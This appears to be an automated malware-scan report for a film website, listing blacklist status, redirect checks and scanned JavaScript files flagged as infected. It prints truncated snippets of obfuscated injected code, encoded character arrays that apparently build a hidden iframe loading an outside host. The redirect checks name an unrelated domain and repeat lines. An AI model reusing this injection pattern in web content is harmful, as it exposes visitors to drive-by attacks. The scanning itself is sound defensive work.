Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bumrushlefilm.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: magicianstube.com
Result:
GET / HTTP/1.1
Host: magicianstube.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: magicianstube.com
Referer: http://www.google.com/search?q=magicianstube.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: magicianstube.com
Referer: http://www.google.com/search?q=magicianstube.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
| Request | Server response | Status |
http://www.bumrushlefilm.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=900 Connection: close Date: Tue, 30 Sep 2014 10:11:26 GMT Age: 1 Location: http://www.bumrushmovie.com Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | malicious |
http://www.bumrushmovie.com/ | 200 OK Content-Length: 7291 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="s"+"p"+"l"+"i"+"t";asd=function(){--(d.body)};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,200,172,166,162,162,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,200,172,166,162,162,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,176,154,151,70,67,74,65,176,154,151,151,166,177,73,73,73,65,172,154,171,175,154,171,64,157,166,164,15 Antivirus reports:
| ||
http://www.bumrushmovie.com/js/swfobject.js | 200 OK Content-Length: 15729 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ps="s"+"p"+"l"+"i"+"t";asd=function(){--(d.body)};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,173,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,173,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,176,154,151,70,67,74,65,176,154,151,151,166,177,73,73,73,65,172,154,171,175,154,171,64,157,166,164,154,65,166,171,156,66,172,152,171, Antivirus reports:
| ||
http://www.bumrushlefilm.com/js/swfaddress.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=900 Connection: close Date: Tue, 30 Sep 2014 10:11:28 GMT Age: 1 Location: http://www.bumrushmovie.com/js/swfaddress.js Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | malicious |
http://www.bumrushmovie.com/js/swfaddress.js | 200 OK Content-Length: 21418 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ps="s"+"p"+"l"+"i"+"t";asd=function(){--(d.body)};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,173,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,173,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,176,154,151,70,67,74,65,176,154,151,151,166,177,73,73,73,65,172,154,171,175,154,171,64,157,166,164,154,65,166,171,156,66,172,152,171, Antivirus reports:
| ||
http://www.bumrushlefilm.com/js/swffit.js?strict=false | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=900 Connection: close Date: Tue, 30 Sep 2014 10:11:30 GMT Age: 0 Location: http://www.bumrushmovie.com/js/swffit.js?strict=false Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | malicious |
http://www.bumrushmovie.com/js/swffit.js?strict=false | 200 OK Content-Length: 9366 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ps="s"+"p"+"l"+"i"+"t";asd=function(){--(d.body)};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,173,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,173,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,176,154,151,70,67,74,65,176,154,151,151,166,177,73,73,73,65,172,154,171,175,154,171,64,157,166,164,154,65,166,171,156,66,172,152,171, Antivirus reports:
| ||
http://www.bumrushlefilm.com/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=900 Connection: close Date: Tue, 30 Sep 2014 10:11:31 GMT Age: 0 Location: http://www.bumrushmovie.com/test404page.js Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | malicious |
http://www.bumrushmovie.com/test404page.js | 404 Not Found Content-Length: 401 Content-Type: text/html | clean |
